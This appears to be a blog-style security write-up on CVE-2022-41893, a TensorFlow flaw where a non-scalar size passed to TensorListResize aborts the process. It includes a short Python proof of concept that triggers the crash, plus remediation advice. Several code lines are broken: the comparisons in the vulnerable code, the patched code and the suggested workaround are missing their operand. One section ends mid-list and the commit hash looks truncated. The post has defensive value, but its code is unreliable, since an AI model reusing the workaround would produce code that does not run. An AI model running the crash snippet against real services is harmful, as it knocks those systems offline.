TensorFlow is a major open source platform for machine learning used in research, production, and countless critical machine learning systems. However, even the most dependable software can have flaws, and in late 2022, a significant vulnerability (CVE-2022-41893) was discovered in a key TensorFlow operation, putting user systems at risk of denial-of-service attacks. In this in-depth post, you’ll learn exactly what the vulnerability is, how it can be exploited, the specifics of the underlying code, and what you need to do to keep your environment safe.
What is CVE-2022-41893?
CVE-2022-41893 is a vulnerability in TensorFlow, specifically in the way the raw operation tf.raw_ops.TensorListResize handles its inputs. When the size argument is a nonscalar type (for example, a list or vector instead of a single number), TensorFlow triggers a CHECK failure. By deliberately sending such input, an attacker can crash the Python process running TensorFlow, causing a denial-of-service (DoS).
This is a major problem especially if TensorFlow is running in a critical, unattended, or remote environment, such as in cloud APIs or production ML systems.
The dangerous code (paraphrased and simplified for clarity) is located in the TensorFlow source here
// Vulnerable code prior to fix
void TensorListResize(const OpKernelContext* ctx, ... ,
const Tensor& size_input) {
// Expects size_input to be scalar; doesn't check or handle otherwise
CHECK(size_input.dims() == );
...
}
CHECK is a macro that forces the process to abort if its condition isn’t met. If the input isn’t a scalar, the operation will immediately crash the process.
Attackers can call this operation with a malformed size input, leading to an intentional crash. Here’s a Python snippet that demonstrates the exploit:
import tensorflow as tf
# Create a dummy TensorList
dummy_tensorlist = tf.raw_ops.EmptyTensorList(element_dtype=tf.float32, element_shape=[1])
# Malicious nonscalar 'size' input
bad_size = tf.constant([10, 20], dtype=tf.int32) # Not a scalar
# This call will crash TensorFlow!
tf.raw_ops.TensorListResize(input_handle=dummy_tensorlist, size=bad_size, element_dtype=tf.float32)
On affected versions, running the above code will trigger a hard crash on any system.
Patch and Remediation
The TensorFlow team addressed this flaw in commit 888e34b49009a4e734c27abc43bb5102682c56:
// Fixed code after patch
void TensorListResize(const OpKernelContext* ctx, ... ,
const Tensor& size_input) {
OP_REQUIRES(ctx, size_input.dims() == ,
errors::InvalidArgument("Expected scalar size input"));
...
}
Instead of crashing, the operation will now return a user-friendly error, keeping your process alive and helping debug the problem.
See the official advisory and commit here
- TensorFlow GHSA-4h9j-7cw8-jjp4 / CVE-2022-41893 advisory
- Patched commit 888e34b49009a4e734c27abc43bb5102682c56
How to Protect Your Environment
- Upgrade TensorFlow: If you run 2.7 or older, upgrade to a supported version (2.8.4, 2.9.3, 2.10.1, or 2.11+) that has the patch.
- Don’t trust user input: If you expose TensorFlow for API or user-side consumption, validate input before it reaches the backend.
- Code-level workaround: If you are unable to upgrade, wrap any call to tf.raw_ops.TensorListResize and check that the size is a scalar:
def safe_tensorlist_resize(handle, size, dtype):
if tf.rank(size) != :
raise ValueError("size argument must be a scalar")
return tf.raw_ops.TensorListResize(input_handle=handle, size=size, element_dtype=dtype)
Why Does This Matter?
Even though Denial-of-Service is sometimes viewed as less severe than code execution, it can be devastating in the wrong context:
Conclusion
The CVE-2022-41893 TensorFlow vulnerability shows how small type-safety bugs can have serious effects in widely-used software. If you use TensorFlow, make sure you are running a patched version. If you maintain public ML APIs or cloud inference solutions, update and audit your code for similar input validation issues.
References
- TensorFlow Security Advisory GHSA-4h9j-7cw8-jjp4
- Patched commit 888e34b49009a4e734c27abc43bb5102682c56
- TensorFlow release notes
Timeline
Published on: 11/18/2022 22:15:00 UTC
Last modified on: 11/22/2022 20:50:00 UTC